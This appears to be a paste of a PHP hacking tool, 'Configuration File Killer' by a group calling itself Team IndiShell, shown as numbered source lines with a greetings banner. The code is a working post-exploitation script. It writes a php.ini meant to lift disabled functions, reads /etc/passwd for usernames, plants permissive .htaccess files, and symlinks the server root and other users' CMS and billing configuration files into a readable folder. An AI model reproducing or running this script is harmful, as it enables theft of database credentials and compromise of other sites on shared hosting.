Config Killer , Symlinker


DATE: Aug. 22, 2016, 11:31 a.m.

FORMAT: Text only

SIZE: 7.9 kB

HITS: 834

  1. <?php
  2. $head = '
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  6. <title>--==[[Configuration File Killer By Team IndiShell]]==--</title>
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  119. <?php
  120. echo $head ;
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  123. <td width="100%" align=center valign="top" rowspan="1">
  124. <font color=red size=5 face="comic sans ms"><b>--==[[ Configuration</font><font color=white size=5 face="comic sans ms"><b> File Killer By</font><font color=green size=5 face="comic sans ms"><b> Team IndiShell ]]==--</font> <div class="hedr">
  125. <td height="10" align="left" class="td1"></td></tr><tr><td
  126. width="100%" align="center" valign="top" rowspan="1"><font
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  128. <font color=red>
  129. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br> Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>
  130. <font color=white>--==[[Dedicated to]]==--</font>
  131. <br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Deepika Kaushik</font><br><font color=red>
  132. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
  133. </table>
  134. ';
  135. ?>
  136. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_ </font><br></td></tr></table>
  137. <form method=post><font color=white size=2 face="comic sans ms">The button given below generates php.ini file :)</font><p>
  138. <input type=submit name=ini value="use to Generate PHP.ini" /></form>
  139. <form method=post><font color=white size=2 face="comic sans ms">The button given below extract usernames for symlink :)</font><p>
  140. <input type=submit name="usre" value="use to Extract usernames" /></form>
  141. <?php
  142. if(isset($_POST['ini']))
  143. {
  144. $r=fopen('php.ini','w');
  145. $rr=" disbale_functions=none ";
  146. fwrite($r,$rr);
  147. $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  148. echo $link;
  149. }
  150. ?>
  151. <?php
  152. if(isset($_POST['usre'])){
  153. ?><form method=post>
  154. <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
  155. foreach($users as $user)
  156. {
  157. $str=explode(":",$user);
  158. echo $str[0]."\n";
  159. }
  160. ?></textarea><br><br>
  161. <input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
  162. <?php } ?>
  163. <?php
  164. error_reporting(0);
  165. echo "<font color=red size=2 face=\"comic sans ms\">";
  166. if(isset($_POST['su']))
  167. {
  168. mkdir('Indishell',0777);
  169. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  170. $g = fopen('Indishell/.htaccess','w');
  171. fwrite($g,$rr);
  172. $indishell = symlink("/","Indishell/root");
  173. $rt="<a href=Indishell/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
  174. echo "Bhai ji .... check link given below for / folder symlink <br><u>$rt</u>";
  175. $dir=mkdir('INDISHELL',0777);
  176. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  177. $f = fopen('INDISHELL/.htaccess','w');
  178. fwrite($f,$r);
  179. $consym="<a href=INDISHELL/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  180. echo "<br>The link given below for configuration file it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  181. $usr=explode("\n",$_POST['user']);
  182. $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
  183. foreach($usr as $uss )
  184. {
  185. $us=trim($uss);
  186. foreach($configuration as $c)
  187. {
  188. $rs="/home/".$us."/public_html/".$c;
  189. $r="INDISHELL/".$us." .. ".$c;
  190. symlink($rs,$r);
  191. }
  192. }
  193. }
  194. ?>

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